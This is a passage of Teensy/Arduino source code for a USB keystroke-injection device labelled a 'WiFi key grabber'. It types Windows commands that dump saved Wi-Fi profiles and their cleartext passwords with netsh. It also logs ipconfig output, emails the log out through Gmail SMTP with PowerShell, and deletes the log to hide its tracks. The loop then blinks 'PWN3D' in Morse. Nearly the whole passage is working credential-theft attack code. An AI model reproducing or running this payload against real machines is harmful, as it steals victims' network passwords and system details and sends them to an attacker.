Keyboard.set_key1(KEY_QUOTE); 122 | Keyboard.send_now(); 123 | Keyboard.set_modifier(0); 124 | Keyboard.set_key1(0); 125 | Keyboard.send_now(); 126 | Keyboard.print("BSSID"); 127 | Keyboard.set_modifier(MODIFIERKEY_SHIFT); 128 | Keyboard.set_key1(KEY_QUOTE); 129 | Keyboard.send_now(); 130 | Keyboard.set_modifier(0); 131 | Keyboard.set_key1(0); 132 | Keyboard.send_now(); 133 | Keyboard.print("') do set A=%A"); 134 | PressKey(KEY_ENTER, 1); 135 | 136 | 137 | Keyboard.print("netsh wlan show profiles %A% key=clear | findstr /c:"); 138 | Keyboard.set_modifier(MODIFIERKEY_SHIFT); 139 | Keyboard.set_key1(KEY_QUOTE); 140 | Keyboard.send_now(); 141 | Keyboard.set_modifier(0); 142 | Keyboard.set_key1(0); 143 | Keyboard.send_now(); 144 | Keyboard.print("Network type"); 145 | Keyboard.set_modifier(MODIFIERKEY_SHIFT); 146 | Keyboard.set_key1(KEY_QUOTE); 147 | Keyboard.send_now(); 148 | Keyboard.set_modifier(0); 149 | Keyboard.set_key1(0); 150 | Keyboard.print(" /c:"); 151 | Keyboard.set_modifier(MODIFIERKEY_SHIFT); 152 | Keyboard.set_key1(KEY_QUOTE); 153 | Keyboard.send_now(); 154 | Keyboard.set_modifier(0); 155 | Keyboard.set_key1(0); 156 | Keyboard.print("Authentication"); 157 | Keyboard.set_modifier(MODIFIERKEY_SHIFT); 158 | Keyboard.set_key1(KEY_QUOTE); 159 | Keyboard.send_now(); 160 | Keyboard.set_modifier(0); 161 | Keyboard.set_key1(0); 162 | Keyboard.print(" /c:"); 163 | Keyboard.set_modifier(MODIFIERKEY_SHIFT); 164 | Keyboard.set_key1(KEY_QUOTE); 165 | Keyboard.send_now(); 166 | Keyboard.set_modifier(0); 167 | Keyboard.set_key1(0); 168 | Keyboard.print("Key Content"); 169 | Keyboard.set_modifier(MODIFIERKEY_SHIFT); 170 | Keyboard.set_key1(KEY_QUOTE); 171 | Keyboard.send_now(); 172 | Keyboard.set_modifier(0); 173 | Keyboard.set_key1(0); 174 | Keyboard.print(" | findstr /v "); 175 | Keyboard.set_modifier(MODIFIERKEY_SHIFT); 176 | Keyboard.set_key1(KEY_QUOTE); 177 | Keyboard.send_now(); 178 | Keyboard.set_modifier(0); 179 | Keyboard.set_key1(0); 180 | Keyboard.print("broadcast"); 181 | Keyboard.set_modifier(MODIFIERKEY_SHIFT); 182 | Keyboard.set_key1(KEY_QUOTE); 183 | Keyboard.send_now(); 184 | Keyboard.set_modifier(0); 185 | Keyboard.set_key1(0); 186 | Keyboard.print(" | findstr /v "); 187 | Keyboard.set_modifier(MODIFIERKEY_SHIFT); 188 | Keyboard.set_key1(KEY_QUOTE); 189 | Keyboard.send_now(); 190 | Keyboard.set_modifier(0); 191 | Keyboard.set_key1(0); 192 | Keyboard.print("Radio"); 193 | Keyboard.set_modifier(MODIFIERKEY_SHIFT); 194 | Keyboard.set_key1(KEY_QUOTE); 195 | Keyboard.send_now(); 196 | Keyboard.set_modifier(0); 197 | Keyboard.set_key1(0); 198 | Keyboard.print(">>A.txt"); 199 | PressKey(KEY_ENTER, 1); 200 | 201 | 202 | Keyboard.print("for /f "); 203 | Keyboard.set_modifier(MODIFIERKEY_SHIFT); 204 | Keyboard.set_key1(KEY_QUOTE); 205 | Keyboard.send_now(); 206 | Keyboard.set_modifier(0); 207 | Keyboard.set_key1(0); 208 | Keyboard.print("tokens=3 delims=: "); 209 | Keyboard.set_modifier(MODIFIERKEY_SHIFT); 210 | Keyboard.set_key1(KEY_QUOTE); 211 | Keyboard.send_now(); 212 | Keyboard.set_modifier(0); 213 | Keyboard.set_key1(0); 214 | Keyboard.print(" %A in ('findstr "); 215 | Keyboard.set_modifier(MODIFIERKEY_SHIFT); 216 | Keyboard.set_key1(KEY_QUOTE); 217 | Keyboard.send_now(); 218 | Keyboard.set_modifier(0); 219 | Keyboard.set_key1(0); 220 | Keyboard.print("Network type"); 221 | Keyboard.set_modifier(MODIFIERKEY_SHIFT); 222 | Keyboard.set_key1(KEY_QUOTE); 223 | Keyboard.send_now(); 224 | Keyboard.set_modifier(0); 225 | Keyboard.set_key1(0); 226 | Keyboard.print(" A.txt') do set B=%A"); 227 | PressKey(KEY_ENTER, 1); 228 | 229 | Keyboard.print("for /f "); 230 | Keyboard.set_modifier(MODIFIERKEY_SHIFT); 231 | Keyboard.set_key1(KEY_QUOTE); 232 | Keyboard.send_now(); 233 | Keyboard.set_modifier(0); 234 | Keyboard.set_key1(0); 235 | Keyboard.print("tokens=2 delims=: "); 236 | Keyboard.set_modifier(MODIFIERKEY_SHIFT); 237 | Keyboard.set_key1(KEY_QUOTE); 238 | Keyboard.send_now(); 239 | Keyboard.set_modifier(0); 240 | Keyboard.set_key1(0); 241 | Keyboard.print(" %A in ('findstr "); 242 | Keyboard.set_modifier(MODIFIERKEY_SHIFT); 243 | Keyboard.set_key1(KEY_QUOTE); 244 | Keyboard.send_now(); 245 | Keyboard.set_modifier(0); 246 | Keyboard.set_key1(0); 247 | Keyboard.print("Authentication"); 248 | Keyboard.set_modifier(MODIFIERKEY_SHIFT); 249 | Keyboard.set_key1(KEY_QUOTE); 250 | Keyboard.send_now(); 251 | Keyboard.set_modifier(0); 252 | Keyboard.set_key1(0); 253 | Keyboard.print(" A.txt') do set C=%A"); 254 | PressKey(KEY_ENTER, 1); 255 | 256 | Keyboard.print("for /f "); 257 | Keyboard.set_modifier(MODIFIERKEY_SHIFT); 258 | Keyboard.set_key1(KEY_QUOTE); 259 | Keyboard.send_now(); 260 | Keyboard.set_modifier(0); 261 | Keyboard.set_key1(0); 262 | Keyboard.print("tokens=3 delims=: "); 263 | Keyboard.set_modifier(MODIFIERKEY_SHIFT); 264 | Keyboard.set_key1(KEY_QUOTE); 265 | Keyboard.send_now(); 266 | Keyboard.set_modifier(0); 267 | Keyboard.set_key1(0); 268 | Keyboard.print(" %A in ('findstr "); 269 | Keyboard.set_modifier(MODIFIERKEY_SHIFT); 270 | Keyboard.set_key1(KEY_QUOTE); 271 | Keyboard.send_now(); 272 | Keyboard.set_modifier(0); 273 | Keyboard.set_key1(0); 274 | Keyboard.print("Key Content"); 275 | Keyboard.set_modifier(MODIFIERKEY_SHIFT); 276 | Keyboard.set_key1(KEY_QUOTE); 277 | Keyboard.send_now(); 278 | Keyboard.set_modifier(0); 279 | Keyboard.set_key1(0); 280 | Keyboard.print(" A.txt') do set D=%A"); 281 | PressKey(KEY_ENTER, 1); 282 | 283 | 284 | Keyboard.print("del A.txt"); 285 | PressKey(KEY_ENTER, 1); 286 | 287 | 288 | Keyboard.print("echo SSID: %A%>>Log.txt & echo Network type: %B%>>Log.txt & echo Authentication: %C%>>Log.txt & echo Password: %D%>>Log.txt"); 289 | PressKey(KEY_ENTER, 1); 290 | 291 | Keyboard.print("ipconfig /all>>Log.txt"); 292 | PressKey(KEY_ENTER, 1); 293 | 294 | Keyboard.print("powershell"); 295 | PressKey(KEY_ENTER, 1); 296 | Keyboard.print("$SMTPServer = 'smtp.gmail.com'"); 297 | PressKey(KEY_ENTER, 1); 298 | Keyboard.print("$SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)"); 299 | PressKey(KEY_ENTER, 1); 300 | Keyboard.print("$SMTPInfo.EnableSsl = $true"); 301 | PressKey(KEY_ENTER, 1); 302 | Keyboard.print("$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('REPLACEUSER', 'REPLACEPASS')"); 303 | PressKey(KEY_ENTER, 1); 304 | Keyboard.print("$ReportEmail = New-Object System.Net.Mail.MailMessage"); 305 | PressKey(KEY_ENTER, 1); 306 | Keyboard.print("$ReportEmail.From = 'REPLACEFROM'"); 307 | PressKey(KEY_ENTER, 1); 308 | Keyboard.print("$ReportEmail.To.Add('REPLACETO')"); 309 | PressKey(KEY_ENTER, 1); 310 | Keyboard.print("$ReportEmail.Subject = 'WiFi key grabber'"); 311 | PressKey(KEY_ENTER, 1); 312 | Keyboard.print("$ReportEmail.Body = (Get-Content Log.txt | out-string)"); 313 | PressKey(KEY_ENTER, 1); 314 | Keyboard.print("$SMTPInfo.Send($ReportEmail)"); 315 | PressKey(KEY_ENTER, 1); 316 | delay(5000); 317 | Keyboard.print("exit"); 318 | PressKey(KEY_ENTER, 1); 319 | delay(3000); 320 | Keyboard.print("del Log.txt & exit"); 321 | PressKey(KEY_ENTER, 1); 322 | } 323 | 324 | void loop() { 325 | // Celebratory LED fluttering. 326 | LED_Flutter(200, 10); 327 | 328 | // P 329 | LED_MorseDot(); 330 | LED_MorseDash(); 331 | LED_MorseDash(); 332 | LED_MorseDot(); 333 | 334 | // W 335 | LED_MorseDot(); 336 | LED_MorseDash(); 337 | LED_MorseDash(); 338 | 339 | // N 340 | LED_MorseDash(); 341 | LED_MorseDot(); 342 | 343 | // 3 344 | LED_MorseDot(); 345 | LED_MorseDot(); 346 | LED_MorseDot(); 347 | LED_MorseDash(); 348 | LED_MorseDash(); 349 | 350 | // D 351 | LED_MorseDash(); 352 | LED_MorseDot(); 353 | LED_MorseDot(); 354 | 355 | // Flutter again. 356 | LED_Flutter(200, 10); 357 | } 358 | --------------------------------------------------------------------------------